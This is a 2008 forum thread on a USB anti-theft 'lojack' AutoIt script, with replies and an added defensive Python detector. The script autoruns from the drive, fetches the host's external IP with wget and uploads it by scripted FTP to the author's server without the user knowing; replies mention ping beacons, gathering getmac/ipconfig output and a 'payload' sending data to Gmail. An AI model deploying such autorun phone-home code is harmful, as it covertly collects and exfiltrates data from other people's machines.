haxwithaxe Posted December 7, 2008

Hey all,

I just finished the initial test of my ftp based usb lojak (cause the c is superfluous and the name is trademarked) system. Haven't checked my ftp server yet but we'll see when I get home. I did the alpha in batch and used a compiled autoit script for the last test. It uses wget (if anyone can think of a windows built-in get app I'd like to know about it) to grab the automated whatismyip.com page and windows built-in ftp to send it to my ftp server at home.

If anyone can point out a webmail service that doesn't require ssl/tls to use the smtp please tell me because I couldn't find any, and part of the whole point of this app is that when joe shmoe user (not His/Her Holiness sysadmin) plugs in the drive it will still tell me where it is. So stunnel isn't going to cut it.

The autoit script is based off of the Daily Cup of Tech Script with some slight modifications.

    #NoTrayIcon
    Dim $Message1
    Dim $Message2
    Dim $Message3
    Dim $Message4
    Dim $Message5
    Dim $Message6
    Dim $Title
    $Title = "Help! I'm Lost!"
    $Message1 = "I've been lost and my owner would love to get my data back."
    $Message2 = "Please return me to:"
    $Message3 = "hax , 1337 Haxor WarDrive, Tahkalb, MD 01337"
    $Message4 = "or email me at haxor@haxor.com to arrange a pick-up."
    $Message5 = "You will receive a shiny new USB drive just as big as this one for your trouble."
    $Message6 = "Thanks for your honesty in advance. - hax"
    MsgBox(266304,$Title,$Message1 & @CRLF & $Message2 & @CRLF & $Message3 & @CRLF & $Message4 & @CRLF & $Message5 & @CRLF & $Message6 )
    Run ( "explorer ..\..\..\..\..\..\..\..\..\" ) ;no drive change so it will display the toplevel dir on drive it is run from

    #NoTrayIcon
    DriveGetDrive ( "cdrom" )
    ;get ipaddr and mail it if safe.dat does not exist on C:\
    If FileExists ("C:\safe.dat") Then Exit
    Run ( "wget -P %temp%\ http://whatismyip.com/automation/n09230945.asp" )
    Run ( "ftp -n -s:ip.dat example.com" )

ip.dat is as follows

    echo user ftpuser ftppasswd
    echo bin
    echo put %temp%\n09230945.asp
    echo quit

Also I'm a giant noob when it comes to autoit scripting so please feel free to flame my scripting.

Whoops, left the wrong address in there.
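Added example, not part of the original post: seen from the machine the drive is plugged into, the script above shows up as one parent process doing an external-IP lookup against whatismyip.com and then a scripted FTP upload (`ftp -n -s:`) moments later, which is a pattern a defender can correlate in process-creation logs. The pipe-delimited log format, host names, and the `lost.exe` parent name below are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records: time | host | parent image | command line
SAMPLE_LOG = """\
2008-12-07T14:02:11|LAB-PC07|E:\\lost.exe|wget -P %temp%\\ http://whatismyip.com/automation/n09230945.asp
2008-12-07T14:02:12|LAB-PC07|E:\\lost.exe|ftp -n -s:ip.dat example.com
2008-12-07T14:05:40|LAB-PC07|C:\\Windows\\explorer.exe|ftp ftp.example.org
2008-12-07T15:10:03|LAB-PC09|C:\\Tools\\update.exe|wget http://example.net/patch.zip
"""

# Command-line fetch of an external-IP echo page (the service named in the post).
IP_LOOKUP = re.compile(r"\b(wget|curl)\b.*whatismyip\.com", re.I)
# Non-interactive FTP: auto-login suppressed (-n) and commands read from a file (-s:).
SCRIPTED_FTP = re.compile(r"\bftp(\.exe)?\b(?=.*\s-n\b)(?=.*\s-s:\S+)", re.I)
WINDOW = timedelta(seconds=60)  # assumed correlation window


def parse(log):
    """Yield (timestamp, host, parent image, command line) per record."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, host, parent, cmd = line.split("|", 3)
        yield datetime.fromisoformat(ts), host, parent, cmd


def find_phone_home(log, system_drive="C:"):
    """Alert when one parent does an IP lookup, then a scripted FTP, within WINDOW."""
    lookups = {}  # (host, parent) -> time of the most recent IP lookup
    alerts = []
    for ts, host, parent, cmd in parse(log):
        key = (host, parent.lower())
        if IP_LOOKUP.search(cmd):
            lookups[key] = ts
        elif SCRIPTED_FTP.search(cmd) and key in lookups and ts - lookups[key] <= WINDOW:
            alerts.append({
                "host": host,
                "parent": parent,
                "time": ts.isoformat(),
                # A parent image outside the system drive suggests removable media.
                "off_system_drive": not parent.upper().startswith(system_drive),
                "command": cmd,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_phone_home(SAMPLE_LOG):
        print(alert)
```

The interactive `ftp ftp.example.org` and the unrelated `wget` download in the sample are deliberately left unflagged; only the lookup-then-upload pair from the same parent raises an alert.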

DingleBerries Posted December 7, 2008

I am actually going to use this for my server since it doesn't have a static ip

Xarf Posted December 7, 2008

Why not set up a web server on your home computer (not public) and just put in your code:

    ping <your IP>

Then watch for ICMP in the server logs.

haxwithaxe (Author) Posted December 7, 2008

> Why not set up a web server on your home computer (not public) and just put in your code:
>
>     ping <your IP>
>
> Then watch for ICMP in the server logs.

Some ISPs have their networks set up so that the ping would appear to come from an ISP server and not the target box. Also if they're using a ftp proxy when the drive is plugged-in I don't want to get the ftp proxy's ip. And if they're using a web proxy their ip will show up in my logs. If for some reason they're using both then I'm up a creek.

This isn't meant to be a tool for hacking, just something to help me get my thumb-drive back if it's lost or stolen.

Also the above site was my personal site so don't use it please. I've changed it to protect the inconsiderate from themselves.

X3N Posted December 8, 2008

another way to do this is to use a service like dyndns... which is basically a little program that logs into the dyndns server to bind a name to a dynamic ip address... this could easily be scripted to autorun on a usb drive... the only problem is that if someone has autorun turned off then it totally defeats the purpose because you can't force autorun to run if it's disabled.

haxwithaxe (Author) Posted December 8, 2008

> the only problem is that if someone has autorun turned off then it totally defeats the purpose because you can't force autorun to run if it's disabled.

True. I plan to do a redundant execution. Both autorun from U3 and from all the menu options in the autoplay menu of the fat16 part of the drive. In fact the script above has only been tested with auto play so far. (finals week and I needed an excuse for myself to mess around instead of studying.) Now if they have autorun usb devices turned off completely I have to rely on the DCoT part of the script to work its social engineering magic and have the person return the drive to me.

haxwithaxe (Author) Posted December 8, 2008

Hey all,

I've decided to implement all your suggestions thus far.

- ddns updater
- ping
- ?mail? -- I need to play with that one a while.
- ?ftp? if mailing doesn't work out

Also I've been looking at windows built-in utilities (hence ftp instead of blat). Perhaps getmac, ipconfig will be in there next as well to give some more device specific evidence to the authorities in case of theft.

Again this isn't aimed at uber-hackers so I'm working under the assumption that at least one of the methods will work properly. So if the shmuk at school steals your drive you can turn over the logs to the police and the campus IT department can give them what they need.

X3N Posted December 8, 2008

> Hey all,
>
> I've decided to implement all your suggestions thus far.
>
> - ddns updater
> - ping
> - ?mail? -- I need to play with that one a while.
> - ?ftp? if mailing doesn't work out
>
> Also I've been looking at windows built-in utilities (hence ftp instead of blat). Perhaps getmac, ipconfig will be in there next as well to give some more device specific evidence to the authorities in case of theft.
>
> Again this isn't aimed at uber-hackers so I'm working under the assumption that at least one of the methods will work properly. So if the shmuk at school steals your drive you can turn over the logs to the police and the campus IT department can give them what they need.

i have some autoIT code that will email to gmail using ssl without having to use blat or stunnel... i actually have a full payload that dumps all the info over ssl to gmail via autoIT, it's posted in the usbhacks section.